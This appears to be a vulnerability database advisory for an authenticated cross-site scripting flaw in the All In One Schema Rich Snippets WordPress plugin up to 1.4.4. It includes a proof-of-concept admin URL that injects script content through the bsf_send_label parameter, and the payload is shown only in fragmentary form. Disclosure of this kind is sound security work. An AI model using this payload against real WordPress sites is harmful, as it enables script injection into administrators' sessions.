All In One Schema.org Rich Snippets <= 1.4.4 - Authenticated Cross-Site Scripting (XSS)

2017-05-24T00:00:00
ID WPVDB-ID:8D185B98-D322-4550-BB80-3DAE22307D88
Type wpvulndb
Reporter Neven Biruski
Modified 2020-09-22T07:20:06

Description

The Schema – All In One Schema Rich Snippets WordPress plugin was affected by an Authenticated Cross-Site Scripting (XSS) security vulnerability.

PoC

http://vulnerablesite.com/wp-admin/admin.php?page=rich_snippet_dashboard&bsf;_force_send=true&bsf;_send_label=<%2Fscript>